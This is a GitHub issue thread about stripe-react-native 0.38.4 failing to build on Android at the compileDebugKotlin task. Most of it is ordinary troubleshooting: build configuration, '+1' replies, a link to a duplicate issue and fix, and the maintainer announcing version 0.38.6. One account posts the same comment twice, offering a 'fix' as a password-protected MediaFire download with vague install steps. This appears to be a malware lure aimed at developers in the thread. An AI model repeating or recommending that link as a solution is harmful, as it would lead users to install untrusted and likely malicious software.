### ISSUE TITLE
Execution failed for task ':stripe_stripe-react-native:compileDebugKotlin'. build gradlew failed

### ISSUE THREAD

**Issue by crzycoder** [stripe/stripe-react-native#1721]
**Error**

**Task :stripe_stripe-react-native:compileDebugKotlin FAILED**

After installing string : "@stripe/stripe-react-native": "^0.38.4" , i am unable to run the app in android emulator due to the build e error I have mentioned above.

**APP Versions**

"react": "18.3.1",
"react-native": "0.75.2",
"@stripe/stripe-react-native": "^0.38.4"

**Android build.gradlew**

buildToolsVersion = "34.0.0"
minSdkVersion = 23
compileSdkVersion = 34
targetSdkVersion = 34
ndkVersion = "26.1.10909125"
kotlinVersion = "1.9.24"

**exact build.gradlew**

`buildscript {`
    `ext {`
`        buildToolsVersion = "34.0.0"`
`        minSdkVersion = 23`
`       compileSdkVersion = 34`
`        targetSdkVersion = 34`
`        ndkVersion = "26.1.10909125"`
`        kotlinVersion = "1.9.24"`
`    }`
`    repositories {`
`        google()`
`        mavenCentral()`
`    }`
`   dependencies {`
`        classpath("com.android.tools.build:gradle")`
`        classpath("com.facebook.react:react-native-gradle-plugin")`
`        classpath("org.jetbrains.kotlin:kotlin-gradle-plugin")`
`        classpath 'com.google.gms:google-services:4.4.2'`
`        classpath 'com.google.firebase:firebase-crashlytics-gradle:3.0.2'`
`        classpath 'com.google.firebase:perf-plugin:1.4.2'`
`    }`
`}`

`apply plugin: "com.facebook.react.rootproject"`

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by FernandoAOborges** [comment]
"react-native": "0.75.2" - still experiencing the same issue. Is there a patch available?

**Comment by ctlincfaisal** [comment]
same issue, is someone find solution of this ?

**Comment by danish5454** [comment]
same issue

**Comment by nikhildeorabrandvalley** [comment]
+1

**Comment by carlosraez** [comment]
+1

**Comment by davichoso** [comment]
+1

**Comment by enchorb** [comment]
Looks like a duplicate of https://github.com/stripe/stripe-react-native/issues/1713 with the fix in https://github.com/stripe/stripe-react-native/pull/1719/files

**Comment by FernandoAOborges** [comment]
> Looks like a duplicate of #1713 with the fix in https://github.com/stripe/stripe-react-native/pull/1719/files

If you notice, it's this version: '0.38.4' that's causing the problem, my friend, the same one you mentioned.

**Comment by jblemee** [comment]
We are waiting for the next release. @charliecruzan-stripe :pray: :heart:

**Comment by charliecruzan-stripe** [comment]
released in https://github.com/stripe/stripe-react-native/releases/tag/v0.38.6
